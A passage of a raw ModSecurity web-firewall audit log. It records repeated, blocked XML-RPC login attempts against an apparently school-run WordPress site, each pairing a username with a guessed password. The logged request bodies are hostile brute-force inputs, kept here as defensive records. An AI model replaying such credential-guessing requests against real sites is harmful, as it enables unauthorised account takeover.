Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (150+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777675105836 4734 (- - -)
Stopwatch2: 1744777675105836 4734; combined=3743, p1=455, p2=3069, p3=0, p4=0, p5=124, sr=85, sw=95, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--514e7a0e-Z--
--6e296762-A--
[16/Apr/2025:11:28:55 +0700] Z_8yB0-sESiKFppgz04cNAAAANU 103.236.140.4 37762 103.236.140.4 8181
--6e296762-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6e296762-C--
wp.getUsersBlogs
kasubagtu
kasubagtu@1987
--6e296762-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6e296762-E--
--6e296762-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (151+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777735355843 5203 (- - -)
Stopwatch2: 1744777735355843 5203; combined=4033, p1=465, p2=3354, p3=0, p4=0, p5=122, sr=88, sw=92, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6e296762-Z--
--99440e7e-A--
[16/Apr/2025:11:29:55 +0700] Z_8yQ0-sESiKFppgz04cbgAAANU 103.236.140.4 38298 103.236.140.4 8181
--99440e7e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--99440e7e-C--
wp.getUsersBlogs
kasubagtu
888
--99440e7e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--99440e7e-E--
--99440e7e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (153+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777795065801 4478 (- - -)
Stopwatch2: 1744777795065801 4478; combined=3335, p1=350, p2=2795, p3=0, p4=0, p5=108, sr=81, sw=82, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--99440e7e-Z--
--a043771d-A--
[16/Apr/2025:11:30:55 +0700] Z_8yf0-sESiKFppgz04c9QAAANA 103.236.140.4 38594 103.236.140.4 8181
--a043771d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a043771d-C--
wp.getUsersBlogs
kasubagtu
asdf
--a043771d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a043771d-E--
--a043771d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (142+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777855374686 4308 (- - -)
Stopwatch2: 1744777855374686 4308; combined=3284, p1=364, p2=2740, p3=0, p4=0, p5=104, sr=82, sw=76, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a043771d-Z--
--f4616501-A--
[16/Apr/2025:11:31:31 +0700] Z_8yo0-sESiKFppgz04dDwAAAM8 103.236.140.4 38778 103.236.140.4 8181
--f4616501-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f4616501-C--
wp.getUsersBlogs
kasubagtu
1234%^&*
--f4616501-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f4616501-E--
--f4616501-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777891578712 6189 (- - -)
Stopwatch2: 1744777891578712 6189; combined=4294, p1=562, p2=3564, p3=0, p4=0, p5=102, sr=101, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f4616501-Z--
--565f4870-A--
[16/Apr/2025:11:31:55 +0700] Z_8yuype92T0H9-Aa0y87gAAAEU 103.236.140.4 38888 103.236.140.4 8181
--565f4870-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--565f4870-C--
wp.getUsersBlogs
kasubagtu
Aa123456.
--565f4870-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--565f4870-E--
--565f4870-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777915309187 4118 (- - -)
Stopwatch2: 1744777915309187 4118; combined=3210, p1=377, p2=2669, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--565f4870-Z--
--7fc22051-A--
[16/Apr/2025:11:32:55 +0700] Z_8y95VnVduWmh0dMDMWpwAAAIA 103.236.140.4 39206 103.236.140.4 8181
--7fc22051-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7fc22051-C--
wp.getUsersBlogs
kasubagtu
evite
--7fc22051-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7fc22051-E--
--7fc22051-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (157+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777975758752 4138 (- - -)
Stopwatch2: 1744777975758752 4138; combined=3160, p1=346, p2=2649, p3=0, p4=0, p5=96, sr=79, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7fc22051-Z--
--d4c1ab52-A--
[16/Apr/2025:11:33:55 +0700] Z_8zM0-sESiKFppgz04dLwAAANc 103.236.140.4 39510 103.236.140.4 8181
--d4c1ab52-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d4c1ab52-C--
wp.getUsersBlogs
kasubagtu
manunited
--d4c1ab52-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d4c1ab52-E--
--d4c1ab52-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (151+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778035870760 4230 (- - -)
Stopwatch2: 1744778035870760 4230; combined=3239, p1=346, p2=2728, p3=0, p4=0, p5=96, sr=80, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d4c1ab52-Z--
--010cac48-A--
[16/Apr/2025:11:34:55 +0700] Z_8zb0-sESiKFppgz04dtAAAAM4 103.236.140.4 39802 103.236.140.4 8181
--010cac48-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 236
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--010cac48-C--
wp.getUsersBlogs
administrator
administrator1986
--010cac48-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--010cac48-E--
--010cac48-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (144+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778095180573 4195 (- - -)
Stopwatch2: 1744778095180573 4195; combined=3222, p1=340, p2=2715, p3=0, p4=0, p5=97, sr=82, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--010cac48-Z--
--ccde9100-A--
[16/Apr/2025:11:35:55 +0700] Z_8zqxk9XPLR9cFiTEvD2AAAAAI 103.236.140.4 40080 103.236.140.4 8181
--ccde9100-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ccde9100-C--
wp.getUsersBlogs
administrator
Marketing_
--ccde9100-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ccde9100-E--
--ccde9100-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778155241224 4341 (- - -)
Stopwatch2: 1744778155241224 4341; combined=3318, p1=351, p2=2804, p3=0, p4=0, p5=95, sr=80, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ccde9100-Z--
--2a390d2a-A--
[16/Apr/2025:11:36:55 +0700] Z_8z50-sESiKFppgz04ejgAAAM4 103.236.140.4 40364 103.236.140.4 8181
--2a390d2a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--2a390d2a-C--
wp.getUsersBlogs
administrator
1201230
--2a390d2a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2a390d2a-E--
--2a390d2a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778215356559 4090 (- - -)
Stopwatch2: 1744778215356559 4090; combined=3149, p1=338, p2=2647, p3=0, p4=0, p5=95, sr=77, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2a390d2a-Z--
--800cfa78-A--
[16/Apr/2025:11:37:55 +0700] Z_80I5VnVduWmh0dMDMXUwAAAIQ 103.236.140.4 40648 103.236.140.4 8181
--800cfa78-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 230
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--800cfa78-C--
wp.getUsersBlogs
administrator
12345678910
--800cfa78-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--800cfa78-E--
--800cfa78-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778275098690 4104 (- - -)
Stopwatch2: 1744778275098690 4104; combined=3161, p1=338, p2=2657, p3=0, p4=0, p5=96, sr=79, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--800cfa78-Z--
--c301395f-A--
[16/Apr/2025:11:38:31 +0700] Z_80R5VnVduWmh0dMDMXfQAAAIA 103.236.140.4 40814 103.236.140.4 8181
--c301395f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c301395f-C--
wp.getUsersBlogs
administrator
1234%^&*
--c301395f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c301395f-E--
--c301395f-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778311247540 4318 (- - -)
Stopwatch2: 1744778311247540 4318; combined=3307, p1=345, p2=2796, p3=0, p4=0, p5=98, sr=78, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c301395f-Z--
--69e8a92d-A--
[16/Apr/2025:11:38:55 +0700] Z_80X5VnVduWmh0dMDMXnAAAAIs 103.236.140.4 40934 103.236.140.4 8181
--69e8a92d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--69e8a92d-C--
wp.getUsersBlogs
administrator
whatever
--69e8a92d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--69e8a92d-E--
--69e8a92d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (136+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778335122494 16420 (- - -)
Stopwatch2: 1744778335122494 16420; combined=27582, p1=357, p2=2708, p3=0, p4=0, p5=12272, sr=80, sw=69, l=0, gc=12176
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--69e8a92d-Z--
--97966408-A--
[16/Apr/2025:11:39:55 +0700] Z_80m5VnVduWmh0dMDMX4wAAAI0 103.236.140.4 41222 103.236.140.4 8181
--97966408-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--97966408-C--
wp.getUsersBlogs
administrator
senha
--97966408-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--97966408-E--
--97966408-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744778395452429 4417 (- - -)
Stopwatch2: 1744778395452429 4417; combined=3364, p1=356, p2=2846, p3=0, p4=0, p5=94, sr=81, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--97966408-Z--
--0cf6c574-A--
[16/Apr/2025:11:40:55 +0700] Z_801xk9XPLR9cFiTEvEiwAAABA 103.236.140.4 41472 103.236.140.4 8181
--0cf6c574-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--0cf6c574-C--
wp.getUsersBlogs
administrator
martin
--0cf6c574-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0cf6c574-E--
--0cf6c574-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (124+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
